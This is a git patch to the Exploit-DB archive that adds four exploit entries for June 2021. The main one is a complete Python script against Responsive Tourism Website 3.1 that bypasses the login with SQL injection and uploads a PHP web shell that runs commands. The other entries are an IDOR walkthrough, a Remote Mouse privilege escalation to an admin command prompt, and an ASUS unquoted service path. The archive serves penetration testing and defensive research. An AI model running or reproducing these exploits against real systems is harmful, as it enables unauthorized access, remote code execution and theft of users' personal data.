From d318d8a2c7d5ba0fe82d888e4a70bd0e7b24a866 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 23 Jun 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-06-23 4 changes to exploits/shellcodes ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR) --- exploits/php/webapps/50049.py | 66 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50050.txt | 25 ++++++++++++ exploits/windows/local/50047.txt | 22 +++++------ exploits/windows/local/50048.txt | 39 +++++++++++++++++++ files_exploits.csv | 3 ++ 5 files changed, 142 insertions(+), 13 deletions(-) create mode 100755 exploits/php/webapps/50049.py create mode 100644 exploits/php/webapps/50050.txt create mode 100644 exploits/windows/local/50048.txt diff --git a/exploits/php/webapps/50049.py b/exploits/php/webapps/50049.py new file mode 100755 index 000000000..9191de952 --- /dev/null +++ b/exploits/php/webapps/50049.py @@ -0,0 +1,66 @@ +# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 22.06.2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html +# Version: V 3.1 +# Tested on: MacOS & Windows + +import requests +import random +import string +from bs4 import BeautifulSoup + +url = input("TARGET = ") + +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + + +session = requests.Session() +session.get(url + 'admin/login.php') + +print("- Bypassing login -") + +login_url = url + "classes/Login.php?f=login" +login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"} +session.post(login_url, cookies=session.cookies.get_dict(), data=login_data) + +print("- Protecting User -") + +protectSettings_url = url + 'admin/?page=user' +protectSetting_html = session.get(protectSettings_url) +protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser') + +ids = protectSettings_parser.find('input', {'name':'id'}).get("value") +firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value") +lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value") +username = protectSettings_parser.find('input', {'id':'username'}).get("value") + +print("User ID : " + ids) +print("First Name : " + firstname) +print("Last Name : " + lastname) +print("Username : " + username) + +print("- OK -") + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) + +print("Shell uploading") + +upload_url = url + "classes/Users.php?f=save" +upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"} +upload_payload = "Tagoletta
'; $cmd = ($_GET['cmd']); system($cmd); echo '
'; die; } ?>" +upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n" +upload = session.post(upload_url, headers=upload_headers, data=upload_data) + +if upload.status_code == 200: + print("- OK -") + req = session.get(url + "/admin/?page=user", headers=session.headers) + parser = BeautifulSoup(req.text, 'html.parser') + find_shell = parser.find('img', {'id':'cimg'}) + print("Shell URL : " + find_shell.get("src") + "?cmd=whoami") +else: + print("- NO :( -") \ No newline at end of file diff --git a/exploits/php/webapps/50050.txt b/exploits/php/webapps/50050.txt new file mode 100644 index 000000000..04c48f45b --- /dev/null +++ b/exploits/php/webapps/50050.txt @@ -0,0 +1,25 @@ +# Exploit Title: Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR) +# Date: 21/06/2021 +# Exploit Author: Pratik Khalane +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html +# Version: 1.0 +# Tested on: Windows 10 Pro + + +Vulnerability Details +====================== + +Steps : + + +1) Log in to the application with the given credentials + +Username: kwizera +Password: 12345 + +2) Navigate to Invoice and Click on Print Invoice. + +3)In /Invoice.php?id=3005, modify the id Parameter to View User details, +Address, +Payments, Phone number, and Email of other Users \ No newline at end of file diff --git a/exploits/windows/local/50047.txt b/exploits/windows/local/50047.txt index 008e31170..da0e9af57 100644 --- a/exploits/windows/local/50047.txt +++ b/exploits/windows/local/50047.txt @@ -1,19 +1,15 @@ # Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation -# Exploit Author: Salman Asad (@deathflash1411) +# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io) # Date: 17.06.2021 # Version: Remote Mouse 3.008 # Tested on: Windows 10 Pro Version 21H1 +# Reference: https://deathflash.ml/blog/remote-mouse-lpe -# Note: Local/RDP access is required to exploit this vulnerability +Steps to reproduce: -This method is also known as Citrix Method (Insecure GUI App) -After installation remote mouse runs as administrator and autostarts by default - -PoC: - -Open remote mouse from the system tray -Go to Settings -Click "Change..." in the "Image Transfer Folder" area -Save As prompt will appear -Enter "C:\Windows\System32\cmd.exe" -Command Prompt is spawned with administrator privileges \ No newline at end of file +1. Open Remote Mouse from the system tray +2. Go to "Settings" +3. Click "Change..." in "Image Transfer Folder" section +4. "Save As" prompt will appear +5. Enter "C:\Windows\System32\cmd.exe" in the address bar +6. A new command prompt is spawned with Administrator privileges \ No newline at end of file diff --git a/exploits/windows/local/50048.txt b/exploits/windows/local/50048.txt new file mode 100644 index 000000000..abb9cec34 --- /dev/null +++ b/exploits/windows/local/50048.txt @@ -0,0 +1,39 @@ +# Exploit Title: ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path +# Date: 2021-06-21 +# Exploit Author: Julio Aviña +# Vendor Homepage: https://www.asus.com/ +# Software Link: https://dlcdnets.asus.com/pub/ASUS/LCD%20Monitors/MB16ACE/ASUS_DisplayWidget_3.4.0.036.exe.zip +# Version: 3.4.0.036 +# Service File Version 1.0.0.1 +# Tested on: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%ASUSDisplayWidgetService%"' get displayname, pathname, startmode, startname + +DisplayName PathName StartMode StartName +ASUS DisplayWidget Service by Portrait Displays C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe Auto LocalSystem + +# 2. To check service info: + +C:\>sc qc "ASUSDisplayWidgetService" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: ASUSDisplayWidgetService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : ASUS DisplayWidget Service by Portrait Displays + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +# 3. Exploit: + +A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. +When restarting the service or the system, the inserted executable will run with elevated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ec004e8c1..6a4ce6723 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port 50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows, +50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44195,3 +44196,5 @@ id,file,description,date,author,type,platform,port 50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php, 50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php, 50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php, +50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php, +50050,exploits/php/webapps/50050.txt,"Phone Shop Sales Managements System 1.0 - Insecure Direct Object Reference (IDOR)",2021-06-22,"Pratik Khalane",webapps,php,